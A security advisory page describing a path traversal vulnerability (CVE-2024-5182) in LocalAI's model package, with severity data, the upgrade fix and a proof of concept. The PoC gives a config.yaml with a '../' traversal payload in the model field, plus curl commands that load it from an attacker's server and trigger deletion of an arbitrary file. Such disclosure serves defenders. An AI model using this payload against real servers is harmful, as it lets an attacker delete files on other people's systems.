Path Traversal Affecting github.com/mudler/localai/pkg/model package, versions <2.16.0


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.05% (20th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Path Traversal vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-GOLANG-GITHUBCOMMUDLERLOCALAIPKGMODEL-7315129
  • published21 Jun 2024
  • disclosed20 Jun 2024
  • creditmvlttt

Introduced: 20 Jun 2024

CVE-2024-5182  (opens in a new tab)
CWE-22  (opens in a new tab)

How to fix?

Upgrade github.com/mudler/LocalAI/pkg/model to version 2.16.0 or higher.

Overview

Affected versions of this package are vulnerable to Path Traversal through the model parameter during the model deletion process. An attacker can delete arbitrary files by crafting a request with a manipulated model parameter.

PoC

Create a file named deleteme.txt in the /tmp folder.

Save the following code as config.yaml:

name: "delete_test"
parameters:
  model: ../../../../../../../../tmp/deleteme.txt

usage: | foo

Start a python http server:

python3 -m http.server

Add a model.

curl http://localhost:8080/models/apply -X POST -H "Content-Type: application/json" -d '{"config_url":"<exploit_server>/config.yaml","id":""}'

The model name is the md5 hash of config_url, use this command to calculate this value:

echo -n "<exploit_server>/config.yaml" | md5sum

Delete model:

curl http://localhost:8080/models/delete/f26ecc271c5e79202b71619382c0c22b -X POST

When the process is completed, you will see that the file has been deleted.

References

CVSS Scores

version 4.0
version 3.1